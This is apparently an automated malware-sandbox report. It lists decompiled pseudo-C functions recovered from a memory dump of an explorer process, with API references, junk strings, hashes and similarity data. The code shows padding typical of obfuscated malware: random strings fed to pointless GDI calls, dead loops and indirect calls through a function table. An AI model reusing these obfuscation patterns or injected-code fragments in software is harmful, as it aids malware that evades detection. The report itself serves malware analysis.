										_t176 = E00F5ABE5( &_v96, "bD7t53ZHwm3So1H4sriQbcjFeEJywNGOEl.YnvWv1yA3CY 7N.0Esd0EdcptDr r kop Hkh45b.4xlgwY58BTdpCZYb,Zieyqs5xcbC1  g YoWV7qn4IR6Vk71pbFZGK4KCVP8g,VdSjGquhcXvZGfv mydnvC0n7FNV,g4KJ,ZVfYM7uykQeyCq7rAX.vLIaexkH56Vgs vMkG7,rEbmSeH D1lS6Lqjnhvp.s2VklURfZzRXCYauKjvh6ycFQrMtlpKn1DRS4oUukaO17A35Mlh1.0EYGwaLwyTb0QSWPxeX..I.0NSbME7xYcRtpzhvjeP4cEobJxE8hnX5fcM3N18trFGiXsO6hy,bscdFGJSGZtf.QLQpf BEBDmBSwWMDsjVg3hb3SaueK1NY1qoXMwxdF1Ew516dL9km ZM1GZBh3CVSDdZHPxp QDG9ND1dpEcgo E7vj3h B7YgvQSI0h l fC126NNKQ0v2ggUca iB6Lvskqkq4A5DemNb.F.PHS6n7RQ .08MkX1QU96L2Dha2alMEDPWZ8N4IQmXHMk,3h mpyJQ1tywMG.ZORu4,RpUFlnJM0N3ktMaTsz C 4HjcArZVFdjRVpOfp6WJfzwn4fComeAdMsjg8sgzgDECXLI19nKhxPVDOxY7FhEjZH NrI56Qh.f .sOpzUcYWi0 mHooCQy32aLOT7QhBypsdcSNKf8B2 GV,42WFgAZToFAo XMs2zfNxy6jLkp7eQUxAw3B8FVw5i9ub4jGB4EUuc22urzTR2za4stCIK8eNXuIBS.bnmSRYhDS,, xZkq51MM cec5WjwzJjo,Q3B2 NCF6GN892Siqeq65.W5LmqA4jD6rtFYV2AIuD,AsKadZuxCqmffRRz70BBz6FdjhNL0uZeco2ErFz.J0MtP4D,FJlXT5g6v6UmZH qQViL8KJj2ma5pKxyRw.AQajysUdqjSw 13wDnPseMNDZv1ro.oWeVegiX   .FeHPhgiZUzrbtM.xOt1QUAEe2jpX2R3A,J0KVkMybVOT7JIydI0Uc7 D0VB, Gqvu9JOv 5DGLmz4NK yeTbf4DFhG38xYNH 0z0cBu 1iFw443ozyWMpjlA NEHSie8Ssxw9PA2E.fqKX.vHvr7SbTkCS50Pq 5DKGZFJVerpkhImqFtRVyla8z Ja gmeu4YPQS4Lp d.3J8L58UGpo.tMamF4MytslGJmFehe3C8XFBn8xJFnkDiD xmvT VBQZ. 3gW3ss9cFz4 PG DZOrA829Nbg j1GEQClaICYEnVeTk8PFQubdu5 A7FV7 F,RrE.3sVhZvFc.3nU8vYhNaGLtKSj61tdOChInUjWMy0 Z1BMffR2rpihs8cyNkHZGTLKY44K6y.C oAmq6D9rhwVp,iEpOzPFvWz6Cip9oqInFy IW3jy4EYfSaHNO5x0rMvgeWgMYrTeezytYa3ZXwmKFHzvh1jNomdRB672n8Yx8V8mKAE GlNWChBb9 7 micQsWzRTdAVxx38c0sKwk KIr4RNdm7udfwKBVt.Iy3t oEN6PCBZmyO0F5wqfx.Whuw7G ", _v60);
										_t213 = _t213 + 0xc;
										_v100 = _t176;
										_v36 = 0xfffffffd;
										goto L12;
									}
								} else {
									_t177 =  *0xf89740; // 0x547f6c8
									 *((intOrPtr*)(_t177 + 0x30))(_v16);
									_t179 =  *0xf89740; // 0x547f6c8
									 *((intOrPtr*)(_t179 + 0x30))(_v20);
									_v36 = 0xfffffffe;
									L12:
									_t156 = _v44 + 1;
									__eflags = _t156;
									_v44 = _t156;
									continue;
								}
							}
							break;
						}
						_v44 = _v44 & 0x00000000;
						while(1) {
							__eflags = _v44 - _v52;
							if(_v44 >= _v52) {
								break;
							}
							E00F5AB81(_v48 + _v44 * 4, 0xfffffffe);
							_t151 = _v44 + 1;
							__eflags = _t151;
							_v44 = _t151;
						}
						E00F5AB81( &_v48, _v52 << 2);
						_pop(_t190);
						__eflags = _v56;
						if(_v56 != 0) {
							_t122 = _a16 & 0x00000001;
							__eflags = _a16 & 0x00000001;
							if((_a16 & 0x00000001) != 0) {
								L41:
								_t123 =  *0xf89740; // 0x547f6c8
								 *((intOrPtr*)(_t123 + 0x30))(_v16);
								while(1) {
									__eflags = 0;
									if(0 == 0) {
										goto L44;
									}
								}
							} else {
								_v32 = E00F57721(_t122, _t190, _a4);
								__eflags = _v32;
								if(_v32 >= 0) {
									L40:
									_t194 =  *0xf89778; // 0x0
									 *((intOrPtr*)(_t194 + (_v32 << 4))) = _a4;
									_t195 =  *0xf89778; // 0x0
									 *((intOrPtr*)(_t195 + (_v32 << 4) + 4)) = 1;
									_t196 =  *0xf89778; // 0x0
									 *(_t196 + (_v32 << 4) + 0xc) = _v28;
									_t137 = _v32 << 4;
									__eflags = _t137;
									_t197 =  *0xf89778; // 0x0
									 *((intOrPtr*)(_t197 + _t137 + 8)) = _v20;
									goto L41;
								} else {
									BitBlt(0, 0x3b, 0x1c, 0x49, 0x29, 0, 0x45, 0x3e, 8);
									_t183 =  *0xf89774; // 0x0
									_t139 =  *0xf89774; // 0x0
									_t141 = E00F5AC9A(_t183 + 1 << 4, 0xf89778, _t139 << 4);
									__eflags = _t141;
									if(_t141 != 0) {
										_t142 =  *0xf89774; // 0x0
										_v32 = _t142;
										_t143 =  *0xf89774; // 0x0
										_t144 = _t143 + 1;
										__eflags = _t144;
										 *0xf89774 = _t144;
										goto L40;
									} else {
										while(1) {
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
									}
								}
							}
						} else {
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_v36 = 0xfffffffb;
						}
					} else {
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_v36 = _v36 | 0xffffffff;
					}
				} else {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_v36 = 0xfffffffe;
				}
				L44:
				E00F5AB81( &_v24, _v40);
				return _v36;
			}

0x00f56630
0x00f56634
0x00f56638
0x00f5663c
0x00f56640
0x00f56644
0x00f56648
0x00f56658
0x00f5666d
0x00f56673
0x00f56677
0x00f56690
0x00f56694
0x00f56698
0x00f5669c
0x00f566aa
0x00f566ad
0x00f566b1
0x00f566c7
0x00f566d4
0x00f566d7
0x00f566da
0x00000000
0x00000000
0x00f566ed
0x00f566f4
0x00f566f6
0x00000000
0x00f566fc
0x00f566ff
0x00f56707
0x00f5670f
0x00f5671d
0x00f56722
0x00f56725
0x00f5672a
0x00f56731
0x00f56755
0x00f56768
0x00f5676f
0x00f56771
0x00f567b6
0x00f567bb
0x00f567bd
0x00f567f0
0x00f567f3
0x00f567bf
0x00f567bf
0x00f567bf
0x00f567c1
0x00000000
0x00000000
0x00f567c3
0x00f567c8
0x00f567cd
0x00f567d3
0x00f567d8
0x00f567db
0x00000000
0x00f567db
0x00f56773
0x00f56776
0x00f5677b
0x00f56781
0x00f56786
0x00f56789
0x00f5679c
0x00f567a1
0x00f567a4
0x00f567a7
0x00000000
0x00f567a7
0x00f56733
0x00f56736
0x00f5673b
0x00f56741
0x00f56746
0x00f56749
0x00f566cd
0x00f566d0
0x00f566d0
0x00f566d1
0x00000000
0x00f566d1
0x00f56731
0x00000000
0x00f566f6
0x00f56801
0x00f5680e
0x00f56811
0x00f56814
0x00000000
0x00000000
0x00f56822
0x00f5680a
0x00f5680a
0x00f5680b
0x00f5680b
0x00f56836
0x00f5683c
0x00f5683d
0x00f56841
0x00f5685d
0x00f5685d
0x00f56860
0x00f5691b
0x00f5691e
0x00f56923
0x00f56926
0x00f56926
0x00f56928
0x00000000
0x00000000
0x00f5692a
0x00f56866
0x00f5686f
0x00f56872
0x00f56876
0x00f568cf
0x00f568d5
0x00f568de
0x00f568e7
0x00f568ed
0x00f568fb
0x00f56904
0x00f5690b
0x00f5690b
0x00f5690e
0x00f56917
0x00000000
0x00f56878
0x00f5688a
0x00f56890
0x00f5689a
0x00f568a8
0x00f568ae
0x00f568b0
0x00f568bc
0x00f568c1
0x00f568c4
0x00f568c9
0x00f568c9
0x00f568ca
0x00000000
0x00f568b2
0x00f568b2
0x00f568b2
0x00f568b4
0x00000000
0x00000000
0x00f568b6
0x00f568b8
0x00f568b0
0x00f56876
0x00f56843
0x00f56843
0x00f56843
0x00f56845
0x00000000
0x00000000
0x00f56847
0x00f56849
0x00f56849
0x00f566b3
0x00f566b3
0x00f566b3
0x00f566b5
0x00000000
0x00000000
0x00f566b7
0x00f566b9
0x00f566b9
0x00f56679
0x00f56679
0x00f56679
0x00f5667b
0x00000000
0x00000000
0x00f5667d
0x00f5667f
0x00f5667f
0x00f5692c
0x00f56933
0x00f56940

APIs

BitBlt.GDI32(00000000,00000042,00000000,00000011,00000000,00000000,0000001C,0000005D,00000040), ref: 00F5666D

Strings

bD7t53ZHwm3So1H4sriQbcjFeEJywNGOEl.YnvWv1yA3CY 7N.0Esd0EdcptDr r kop Hkh45b.4xlgwY58BTdpCZYb,Zieyqs5xcbC1 g YoWV7qn4IR6Vk71pbFZGK4KCVP8g,VdSjGquhcXvZGfv mydnvC0n7FNV,g4KJ,ZVfYM7uykQeyCq7rAX.vLIaexkH56Vgs vMkG7,rEbmSeH D1lS6Lqjnhvp.s2VklURfZzRXCYauKjvh6ycFQrMt, xrefs: 00F56793

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: bD7t53ZHwm3So1H4sriQbcjFeEJywNGOEl.YnvWv1yA3CY 7N.0Esd0EdcptDr r kop Hkh45b.4xlgwY58BTdpCZYb,Zieyqs5xcbC1 g YoWV7qn4IR6Vk71pbFZGK4KCVP8g,VdSjGquhcXvZGfv mydnvC0n7FNV,g4KJ,ZVfYM7uykQeyCq7rAX.vLIaexkH56Vgs vMkG7,rEbmSeH D1lS6Lqjnhvp.s2VklURfZzRXCYauKjvh6ycFQrMt
API String ID: 0-1824478736
Opcode ID: e901a19b084696c620e6853130819609770f299cecc1553855ac1572369cede4
Instruction ID: 27aadfe851e85fccdd1dfc51ec45df18c0870f57173c5fa6b74e35553cc61378
Opcode Fuzzy Hash: e901a19b084696c620e6853130819609770f299cecc1553855ac1572369cede4
Instruction Fuzzy Hash: 3BA13671D14209EFEB10CFA8DC85BEDBBB0FB08326F540115EA21EB2A1D7749949EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F58EBE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00F58EBE(void* __edx, void* __eflags, intOrPtr _a4, char _a8, short _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				intOrPtr _v36;
				short _v40;
				char _v44;
				intOrPtr _t37;
				void* _t38;
				intOrPtr _t40;
				void* _t41;
				void* _t42;
				intOrPtr _t46;
				void* _t53;
				void* _t56;
				void* _t61;
				void* _t62;
				intOrPtr* _t63;

				_t62 = __edx;
				_v8 = 0xffffffe1;
				E00F5CEF9(__edx,  &_v28);
				E00F5CEF9(__edx,  &_v20);
				_v44 = _a8;
				_v40 = _a12;
				_pop(_t56);
				_v36 = _a16;
				_v32 =  &_v20;
				_t63 = E00F5C179(_t56, _a4,  &_v44, 0x10, 1);
				if(_t63 != 0) {
					while(1) {
						_t37 =  *0xf89740; // 0x547f6c8
						_t38 =  *((intOrPtr*)(_t37 + 0x2c))( *_t63, 0x3e8);
						__eflags = _t38;
						if(_t38 == 0) {
							break;
						}
						__eflags = _t38 - 0xffffffff;
						if(_t38 == 0xffffffff) {
							_v8 = 0xffffffde;
							L11:
							_t42 = E00F5CEF9(_t62, 0);
							__eflags = _t62;
							if(__eflags > 0) {
								L15:
								__eflags = _v8 - 0xffffffe1;
								if(_v8 == 0xffffffe1) {
									_t46 =  *0xf89740; // 0x547f6c8
									 *((intOrPtr*)(_t46 + 0xc8))( *_t63, 0);
								}
								E00F5C10C(_t63, 1);
								return _v8;
							}
							if(__eflags < 0) {
								L14:
								CreateEnhMetaFileA(0, "FC Kz7Q0qG4bdEJkYse4LS ,XC8a 91H10jk6 v 5PimwQBg U.LI8buSRDE7mieB iXevJ46SrTe8XknYE7kaWeaRasNT7GTI72tUkqX B4u.biNW0i8jT .C.JA7di7TTX2RCbJCXGxkQ3r3f1jVdLLefMeUE,Bj8v0j12F4e69O JbBdWRPhp", 0, 0);
								goto L15;
							}
							__eflags = _t42 - 0x2bcf;
							if(_t42 >= 0x2bcf) {
								goto L15;
							}
							goto L14;
						}
						E00F5CEF9(_t62,  &_v28);
						_t61 = _v20 + 0xf0;
						asm("adc eax, ebx");
						__eflags = _v24 - _v16;
						if(__eflags > 0) {
							goto L11;
						}
						if(__eflags < 0) {
							continue;
						}
						__eflags = _v28 - _t61;
						if(_v28 >= _t61) {
							goto L11;
						}
					}
					_t40 =  *0xf89740; // 0x547f6c8
					_t41 =  *((intOrPtr*)(_t40 + 0xe4))( *_t63,  &_v8);
					__eflags = _t41;
					if(_t41 == 0) {
						IsValidCodePage(0x2a);
						_v8 = 0xffffffdf;
					}
					goto L11;
				}
				_t53 = 0xffffffe0;
				return _t53;
			}

0x00f58ebe
0x00f58eca
0x00f58ed1
0x00f58edb
0x00f58ee3
0x00f58eea
0x00f58ef1
0x00f58ef2
0x00f58efa
0x00f58f0b
0x00f58f14
0x00f58f1e
0x00f58f1e
0x00f58f2a
0x00f58f2d
0x00f58f2f
0x00000000
0x00000000
0x00f58f31
0x00f58f34
0x00f58f82
0x00f58f89
0x00f58f8a
0x00f58f90
0x00f58f92
0x00f58fab
0x00f58fab
0x00f58faf
0x00f58fb1
0x00f58fb9
0x00f58fb9
0x00f58fc3
0x00000000
0x00f58fcb
0x00f58f94
0x00f58f9d
0x00f58fa5
0x00000000
0x00f58fa5
0x00f58f96
0x00f58f9b
0x00000000
0x00000000
0x00000000
0x00f58f9b
0x00f58f3a
0x00f58f46
0x00f58f4c
0x00f58f4e
0x00f58f51
0x00000000
0x00000000
0x00f58f53
0x00000000
0x00000000
0x00f58f55
0x00f58f58
0x00000000
0x00000000
0x00f58f5a
0x00f58f62
0x00f58f67
0x00f58f6d
0x00f58f6f
0x00f58f73
0x00f58f79
0x00f58f79
0x00000000
0x00f58f6f
0x00f58f18
0x00000000

APIs

Part of subcall function 00F5CEF9: GetSystemTimeAsFileTime.KERNEL32(?,?,00F54CCA,00000000), ref: 00F5CF03
Part of subcall function 00F5CEF9: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F5CF23

IsValidCodePage.KERNEL32(0000002A,?,?,00000004,00000000,?,?,?,?,?,00F5941B,?,?,?), ref: 00F58F73
CreateEnhMetaFileA.GDI32(00000000,FC Kz7Q0qG4bdEJkYse4LS ,XC8a 91H10jk6 v 5PimwQBg U.LI8buSRDE7mieB iXevJ46SrTe8XknYE7kaWeaRasNT7GTI72tUkqX B4u.biNW0i8jT .C.JA7di7TTX2RCbJCXGxkQ3r3f1jVdLLefMeUE,Bj8v0j12F4e69O JbBdWRPhp,00000000,00000000), ref: 00F58FA5

Strings

FC Kz7Q0qG4bdEJkYse4LS ,XC8a 91H10jk6 v 5PimwQBg U.LI8buSRDE7mieB iXevJ46SrTe8XknYE7kaWeaRasNT7GTI72tUkqX B4u.biNW0i8jT .C.JA7di7TTX2RCbJCXGxkQ3r3f1jVdLLefMeUE,Bj8v0j12F4e69O JbBdWRPhp, xrefs: 00F58F9F

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: FileTime$CodeCreateMetaPageSystemUnothrow_t@std@@@Valid__ehfuncinfo$??2@
String ID: FC Kz7Q0qG4bdEJkYse4LS ,XC8a 91H10jk6 v 5PimwQBg U.LI8buSRDE7mieB iXevJ46SrTe8XknYE7kaWeaRasNT7GTI72tUkqX B4u.biNW0i8jT .C.JA7di7TTX2RCbJCXGxkQ3r3f1jVdLLefMeUE,Bj8v0j12F4e69O JbBdWRPhp
API String ID: 2035893380-1418523460
Opcode ID: e07b5a294dcd538c709d89629ab48db6fde4541efefec46d0e0b18338497ab83
Instruction ID: 2f3e6101d24cd2b7d87e2fdad7b2f9b0e11e6672e7031efd00bed9280cf7f46a
Opcode Fuzzy Hash: e07b5a294dcd538c709d89629ab48db6fde4541efefec46d0e0b18338497ab83
Instruction Fuzzy Hash: 6B317071900209EFDB10DFA8DC859ED77B9FB08362F140526FB12F7191EB309949AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F577A7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F5CFBA: _vsnprintf.MSVCRT ref: 00F5CFCF

CancelDC.GDI32(00000000,?,?,?,?,00F57700,00000000), ref: 00F5780E
BitBlt.GDI32(00000000,0000005D,0000004C,0000000F,00000044,00000000,00000011,0000005D,00000057), ref: 00F578A4

Strings

p%08x, xrefs: 00F577BE

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: Cancel_vsnprintf
String ID: p%08x
API String ID: 1605221003-3308710075
Opcode ID: f0f0d7c87f80300e6cf0b1e06f5a3ac55053799169c6c632ee699f3aa352a0a1
Instruction ID: 250e8a4db973ffa0b7845b976438024a32dc20cd0da1641d0b45d172cc85e83e
Opcode Fuzzy Hash: f0f0d7c87f80300e6cf0b1e06f5a3ac55053799169c6c632ee699f3aa352a0a1
Instruction Fuzzy Hash: 7631703161C304ABEB20EB64EC49FF937A0EB04757F244069EF06AA1D1D6A1D889FB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F5629A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00F5629A(signed int __edx, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _t35;
				signed int _t45;
				signed int _t53;

				_t53 = __edx;
				_v12 = _v12 & 0x00000000;
				_v8 =  *_a4;
				while(0 != 0) {
				}
				ArcTo(0, 0x4d, 0x3d, 8, 0x45, 0x1c, 0x3d, 0x2f, 0x3b);
				_v12 = _v12 & 0x00000000;
				while(1) {
					__eflags = _v12 - _a8;
					if(_v12 >= _a8) {
						goto L9;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t18 = 0xc + _v12 * 0x18; // 0xc
					E00F5AB81(_v8 + _t18,  *((intOrPtr*)(_v8 + 0x10 + _v12 * 0x18)));
					_t45 = _v12 + 1;
					__eflags = _t45;
					_v12 = _t45;
				}
				while(1) {
					L9:
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				__eflags = _a8 << 2;
				E00F5AB81(_a4, _a8 << 2);
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				_t35 = E00F5CEF9(_t53, 0);
				_v20 = _t35;
				_v16 = _t53;
				__eflags = _v16;
				if(__eflags <= 0) {
					if(__eflags < 0) {
						L17:
						return CreateEnhMetaFileA(0, "NYlg5b SJ4ibXW0xze43r0auCkqAHwNSkyn3kNg5zkMz ItUQ jMh5Bi k6VtRvi06P2. 5RHnkumxo5qkoXnA77kcbpo9l25AzGdo WgBzD1P3xp UNouFAHpFuS.8cjwd5pEzysHaispKpCSw. EkRIXp6YQ7xDtrE1 zQKw9 bOyyxv8M8bNcJES,75nDVe1Z7jB9oY6Cd imxP8aG4EH37rBqs4YCzds4mfrkaepoVrFr6moQN1vyPYKOUgF8fh.L5m8QpcgKdADVfIr,7mOiD9dKL608BYcCBRzEJCvjW49DlAMaso.FQrVIXPKeVQf9,lLGcJXLa0rRFTiyrKBezW94dvF4XBQ UxTdpcDt5 wxZasoQ", 0, 0);
					}
					__eflags = _v20 - 0x2bcf;
					if(_v20 < 0x2bcf) {
						goto L17;
					}
				}
				return _t35;
			}

0x00f5629a
0x00f562a0
0x00f562a9
0x00f562ac
0x00f562b0
0x00f562c4
0x00f562ca
0x00f562d7
0x00f562da
0x00f562dd
0x00000000
0x00000000
0x00000000
0x00000000
0x00f562df
0x00f562df
0x00f562df
0x00f562e1
0x00000000
0x00000000
0x00f562e3
0x00f562fb
0x00f56300
0x00f562d3
0x00f562d3
0x00f562d4
0x00f562d4
0x00f56309
0x00f56309
0x00f56309
0x00f5630b
0x00000000
0x00000000
0x00f5630d
0x00f56312
0x00f56319
0x00f56320
0x00f56320
0x00f56322
0x00000000
0x00000000
0x00f56324
0x00f56328
0x00f5632e
0x00f56331
0x00f56334
0x00f56338
0x00f5633a
0x00f56345
0x00000000
0x00f56350
0x00f5633c
0x00f56343
0x00000000
0x00000000
0x00f56343
0x00f56357

APIs

ArcTo.GDI32(00000000,0000004D,0000003D,00000008,00000045,0000001C,0000003D,0000002F,0000003B,?,00F5767D), ref: 00F562C4
CreateEnhMetaFileA.GDI32(00000000,NYlg5b SJ4ibXW0xze43r0auCkqAHwNSkyn3kNg5zkMz ItUQ jMh5Bi k6VtRvi06P2. 5RHnkumxo5qkoXnA77kcbpo9l25AzGdo WgBzD1P3xp UNouFAHpFuS.8cjwd5pEzysHaispKpCSw. EkRIXp6YQ7xDtrE1 zQKw9 bOyyxv8M8bNcJES,75nDVe1Z7jB9oY6Cd imxP8aG4EH37rBqs4YCzds4mfrkaepoVrFr6moQN1vyPYKOUgF8fh.,00000000,00000000), ref: 00F56350

Strings

NYlg5b SJ4ibXW0xze43r0auCkqAHwNSkyn3kNg5zkMz ItUQ jMh5Bi k6VtRvi06P2. 5RHnkumxo5qkoXnA77kcbpo9l25AzGdo WgBzD1P3xp UNouFAHpFuS.8cjwd5pEzysHaispKpCSw. EkRIXp6YQ7xDtrE1 zQKw9 bOyyxv8M8bNcJES,75nDVe1Z7jB9oY6Cd imxP8aG4EH37rBqs4YCzds4mfrkaepoVrFr6moQN1vyPYKOUgF8fh., xrefs: 00F56349

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFileMeta
String ID: NYlg5b SJ4ibXW0xze43r0auCkqAHwNSkyn3kNg5zkMz ItUQ jMh5Bi k6VtRvi06P2. 5RHnkumxo5qkoXnA77kcbpo9l25AzGdo WgBzD1P3xp UNouFAHpFuS.8cjwd5pEzysHaispKpCSw. EkRIXp6YQ7xDtrE1 zQKw9 bOyyxv8M8bNcJES,75nDVe1Z7jB9oY6Cd imxP8aG4EH37rBqs4YCzds4mfrkaepoVrFr6moQN1vyPYKOUgF8fh.
API String ID: 2005549212-4147205725
Opcode ID: f62e6876f3bbc3f46a34308b2835e383787f31ffa1d43c3c1d48b983e533860b
Instruction ID: 46deb2335b193954143b321b9626a0bec09f500a28f752f71e022b6185865754
Opcode Fuzzy Hash: f62e6876f3bbc3f46a34308b2835e383787f31ffa1d43c3c1d48b983e533860b
Instruction Fuzzy Hash: 8B21D331A44208EFDB14CF94DC46F6C7BB0AB10326F504056EB24EB2C1D7749688AB05

Uniqueness

Uniqueness Score: -1.00%

Function 00F683D5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00F683D5(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t5;
				void* _t19;
				void* _t22;

				_t5 = __eax + 0x5000005;
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 + _t5;
				asm("int3");
				_t19 = L00F68010("%s:%d: OpenSSL internal error: %s\n", _a8);
				__imp__raise(0x16, _a12, _a4, _t22);
				_exit(3);
				return _t19;
			}

0x00f683d5
0x00f683da
0x00f683dc
0x00f683de
0x00f683e0
0x00f683e2
0x00f6841f
0x00f68434
0x00f6843e
0x00f68449
0x00f68450

APIs

raise.MSVCRT ref: 00F6843E
_exit.MSVCRT ref: 00F68449

Strings

%s:%d: OpenSSL internal error: %s, xrefs: 00F6842F

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: _exitraise
String ID: %s:%d: OpenSSL internal error: %s
API String ID: 839766296-569889646
Opcode ID: dd772bd53859d3fe8788a148ad9bc61500252f50b6791ad9959710f99ce66b08
Instruction ID: 79109f57ae8d3ab4ce72c8c79fb282b59cd6b3dd8f66971db4bda2718aab52a1
Opcode Fuzzy Hash: dd772bd53859d3fe8788a148ad9bc61500252f50b6791ad9959710f99ce66b08
Instruction Fuzzy Hash: 12F03AF3800204DBD3005AC8FCBFB5F3B78D7247A4B8B6000BA08C52C2E521D4158617

Uniqueness

Uniqueness Score: -1.00%

Function 00F68420, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00F68420(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t5;

				_t5 = L00F68010("%s:%d: OpenSSL internal error: %s\n", _a8);
				__imp__raise(0x16, _a12, _a4);
				_exit(3);
				return _t5;
			}

0x00f68434
0x00f6843e
0x00f68449
0x00f68450

APIs

raise.MSVCRT ref: 00F6843E
_exit.MSVCRT ref: 00F68449

Strings

%s:%d: OpenSSL internal error: %s, xrefs: 00F6842F

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: _exitraise
String ID: %s:%d: OpenSSL internal error: %s
API String ID: 839766296-569889646
Opcode ID: 1b1a89feb472a05e1972a592d1feb4e48b78a3771535dc081faffa3b642a9cb7
Instruction ID: eddeab7af21bf7c6d57d1a17abccc3be2c0ab99f23b7b763239a51d21618bbd1
Opcode Fuzzy Hash: 1b1a89feb472a05e1972a592d1feb4e48b78a3771535dc081faffa3b642a9cb7
Instruction Fuzzy Hash: 3DD05B7514020D7BD700AFDCEC47FA6379CAB48B14F408414F60D86181D672A5649767

Uniqueness

Uniqueness Score: -1.00%

Function 00F65370, Relevance: 5.1, APIs: 4, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00F65370(intOrPtr _a4, intOrPtr* _a8, void* _a12, void* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v16;
				int _v20;
				intOrPtr _v24;
				signed int _v28;
				char _t80;
				intOrPtr* _t91;

				_v8 = _a20 + 7 >> 3;
				_v28 = _v8 << 3;
				_v20 = _v28 - _a20;
				if(_a20 == 0 || _a20 >= 0x80000000) {
					return 0;
				} else {
					if(_a8 != 0) {
						_v16 =  *_a8;
					} else {
						_t80 =  *0xf77ea8; // 0xa65959a6
						_v16 = _t80;
					}
					_v12 = _a20 >> 0x00000018 & 0x000000ff;
					_v11 = _a20 >> 0x00000010 & 0x000000ff;
					_v10 = _a20 >> 0x00000008 & 0x000000ff;
					_v9 = _a20 & 0x000000ff;
					if(_v28 != 8) {
						memmove(_a12, _a16, _a20);
						memset(_a12 + _a20, 0, _v20);
						_v24 = E00F64FD0(_a4,  &_v16, _a12, _a12, _v28, _a24);
					} else {
						memmove(_a12 + 8, _a16, _a20);
						_t91 = _a12;
						 *_t91 = _v16;
						 *((intOrPtr*)(_t91 + 4)) = _v12;
						memset(_a12 + _a20 + 8, 0, _v20);
						_a24(_a12, _a12, _a4);
						_v24 = 0x10;
					}
					return _v24;
				}
			}

0x00f6537f
0x00f65388
0x00f65391
0x00f65398
0x00000000
0x00f653aa
0x00f653ae
0x00f653bf
0x00f653b0
0x00f653b0
0x00f653b5
0x00f653b5
0x00f653cd
0x00f653dc
0x00f653eb
0x00f653f6
0x00f653fd
0x00f65465
0x00f6547b
0x00f654a3
0x00f653ff
0x00f6540e
0x00f65417
0x00f6541d
0x00f65422
0x00f65436
0x00f6544a
0x00f65450
0x00f65450
0x00000000
0x00f654a6

APIs

memmove.MSVCRT ref: 00F6540E
memset.MSVCRT ref: 00F65436
memmove.MSVCRT ref: 00F65465
memset.MSVCRT ref: 00F6547B

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: memmovememset
String ID:
API String ID: 1288253900-0
Opcode ID: a0bc0477570c4e3932428be5707649cf2dd7bf30b108ea3e7a6339e49a9ca9a7
Instruction ID: 0b7292f58449ba2722c7f156c5b01ae13ce6df8f52cae28e0c54cba8ac518a45
Opcode Fuzzy Hash: a0bc0477570c4e3932428be5707649cf2dd7bf30b108ea3e7a6339e49a9ca9a7
Instruction Fuzzy Hash: CD41F9B290024EEFCB04CF98C882AAE7BB5FF98340F148568F91597341D675E9A1DBD1

Uniqueness

Uniqueness Score: -1.00%

